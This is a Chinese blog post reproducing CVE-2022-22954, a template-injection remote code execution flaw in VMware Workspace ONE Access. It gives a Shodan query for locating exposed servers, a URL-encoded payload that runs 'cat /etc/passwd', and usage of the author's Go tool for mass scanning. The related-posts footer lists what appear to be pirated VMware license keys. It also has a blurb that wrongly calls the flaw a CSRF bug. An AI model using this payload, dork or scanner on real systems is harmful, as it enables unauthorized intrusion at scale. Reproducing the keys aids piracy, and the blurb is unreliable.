VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)

已于 2022-04-14 00:29:26 修改
阅读量4.3k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全
于 2022-04-14 00:27:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrHatSec/article/details/124161058
版权

VMware Workspace ONE Access SSTI 漏洞复现

漏洞描述

VMware Workspace ONE Access and Identity Manager 包含一个由于服务器端模板注入而导致的远程代码执行漏洞。VMware 已将此问题的严重性评估为处于 严重严重性范围内 ,CVSSv3 基本得分最高为 9.8。

具有网络访问权限的恶意行为者可以触发可能导致远程代码执行的服务器端模板注入。

漏洞复现

Shodan 语法: http.favicon.hash:-1250474341

在这里插入图片描述
使用 Burp 抓包,然后在 url 处拼接 poc

/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

在这里插入图片描述
Send 之后可以看到 Response 里面已经是利用成功了

工具利用

自己使用 Golang 写了一个简单的批量扫描工具

支持单Url 扫描和批量扫描

多线程并发,默认线程为 10

在这里插入图片描述

单个 Url 扫描用法

用法:

./cve_2022_22954 -u http://127.0.0.1

在这里插入图片描述

批量扫描

用法:

./cve_2022_22954 -f url.txt -t 100

在这里插入图片描述

声明:该POC仅供于学习专用,禁止一切违法操作,如果进行恶意破坏与本人无关!!!

MrHatSec
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22954 VMware Workspace ONE Access SSTI漏洞
include_voidmain的博客
06-09 1118
VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过多因素身份验证、条件访问和单点登录,让您的员工更快地访问SaaS、Web和本机移动应用程序。
VMWare Workspace ONE解决方案.pdf
10-10
VMWare Workspace ONE解决方案.pdf
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
wangluo12138的博客
02-02 686
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
VMware Workspace ONE Access JDBC注入【CVE-2022-22957】
Armandhe的博客
05-10 798
VMware Workspace ONE Access JDBC注入【CVE-2022-22957】
烽火狼烟丨VMware Workspace ONE Access身份验证绕过、本地提权漏洞风险提示
C20220511的博客
05-25 430
1、漏洞概述 近日,WebRAY安全服务产品线监测到VMware官方发布安全公告,修复了两个存在于VMware Workspace ONE Access产品的漏洞VMware认证绕过漏洞CVE-2022-22972):Workspace ONE AccessVMware Identity Manager(vIDM)和vRealize Automation受该漏洞影响,攻击者能够在无需认证的情况下以管理员权限访问服务。 VMware本地提权漏洞CVE-2022-22973):VMwar
VMware Workspace ONE UEM Profile Migration Utility - v1.6.rar
08-13
VMware Workspace ONE UEM配置文件迁移实用程序有助于在Workspace ONE UEM控制台之间移动配置文件。这对于以编程方式将复杂的配置文件从UAT迁移到PROD环境非常有用。
Workspace-ONE-Access-Connector-Installer-20.10.0.0.exe
02-21
Workspace-ONE-Access
VMware Workspace ONE_tool-2.0.0.zip
08-13
Workspace ONE配置工具可帮助您构建专用的unattend.xml配置文件,作为Factory Provisioning的一部分在Dell工厂中应用。这有助于加入域(域,工作组,AAD,AAD Premium)并在首次启动时自动注册设备。这简化了Windows...
Workspace ONE UEM_Samsung_E-FOTA_Tool_v1.2.zip
08-13
Workspace ONE UEM三星E-FOTA工具旨在增加AirWatch三星E-FOTA实施的现有功能。这些新功能包括在目标窗口中计划固件/操作系统更新。此功能取决于AirWatch中的现有功能,该功能将MDM注册到Samsung E-FOTA中并推送配置...
vmware-horizon-workspace 安装配置
10-13
vmware horizon workspace 安装与配置, 服务器虚拟化,应用虚拟化
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
VMWare Workspace ONE产品概述.pptx
10-10
VMWare Workspace ONE产品概述 VMWare Workspace ONE是一个企业数字化平台,旨在提供简单、安全的应用交付和管理解决方案。Workspace ONE整合了身份认证、应用管理和企业移动化管理的所有功能,提供云计算、移动和...
虚拟机workspace
super_song的博客
06-29 228
15.x FC7D0-D1YDL-M8DXZ-CYPZE-P2AY6 UG5J2-0ME12-M89WY-NPWXX-WQH88 GA590-86Y05-4806Y-X4PEE-ZV8E0 YA18K-0WY8P-H85DY-L4NZG-X7RAD UA5DR-2ZD4H-089FY-6YQ5T-YPRX6 B806Y-86Y05-GA590-X4PEE-ZV8E0 ZF582-0NW5N-H8D2P-0XZEE-Z22VA 12.x: ZC3TK-63GE6-481JY-WWW5T-Z7ATA
CVE-2022-22954_VMware 的OFX批量PoC
苏落is菜鸡的博客
05-06 1550
CVE-2022-22954_VMware 的OFX批量PoC
VMware Tools本地提权漏洞CVE-2022-31676分析与复现(1)
C20220511的博客
09-14 1412
VMware Tools没有正确的检查客户端请求的授权,导致包含一个本地权限提升漏洞,可以使虚拟机中的计算机账号由非管理员权限提升到管理员权限。
CVE-2022-22954-VMware Workspace ONE Access SSTI远程代码执行流量特征
12306小哥
06-25 1082
仅用于技术交流和学习研究使用,请勿用于非法攻击,否则造成一切后果与本人无关VMware Workspace ONE Access and Identity Manager包含一个由于服务器端模板注入而导致的远程代码执行漏洞VMware已将此问题的严重性评估为处于严重严重性范围内 ,CVSSv3基本得分最高为9.8。具有网络访问权限的恶意行为者可以触发可能导致远程代码执行的服务器端模板注入。 ...
CVE-2022-22972 VMware Workspace ONE Access 身份认证绕过漏洞分析
顶峰
01-30 1073
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
VMware Workspace ONE UEM安装部署
烟寒若雨的博客
05-23 1170
环境信息 角色 操作系统 IP DB windows server 2012 192.168.1.69 UEM windows server 2016 一:数据库安装 1、双击运行安装包 2、安装Sql Client 3、开始安装 4、配置数据库信息 5、开始安装 需要等待一段时间。...
cve-2022-22954
最新发布
09-01
CVE-2022-22954是一种CSRF跨站请求伪造漏洞,影响到了VMwareWorkspace ONE Access、Identity Manager和vRealize Automation组件。攻击者可以利用该漏洞欺骗受害用户,导致他们无意中完成JDBC URI的验证。具体的漏洞详情和影响范围可以参考VMware官方发布的安全通告。如果要检测该漏洞,可以使用Python脚本CVE-2022-22954-POC.py,根据需要检测单个URL或多个URL。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [VMware 产品多个高危漏洞 (CVE-2022-22954,CVE-2022-22955,CVE-2022-22956,CVE-2022-22957,CVE-2022-22958,...](https://blog.csdn.net/user_hs/article/details/124091125)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具](https://download.csdn.net/download/weixin_59679023/85194448)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值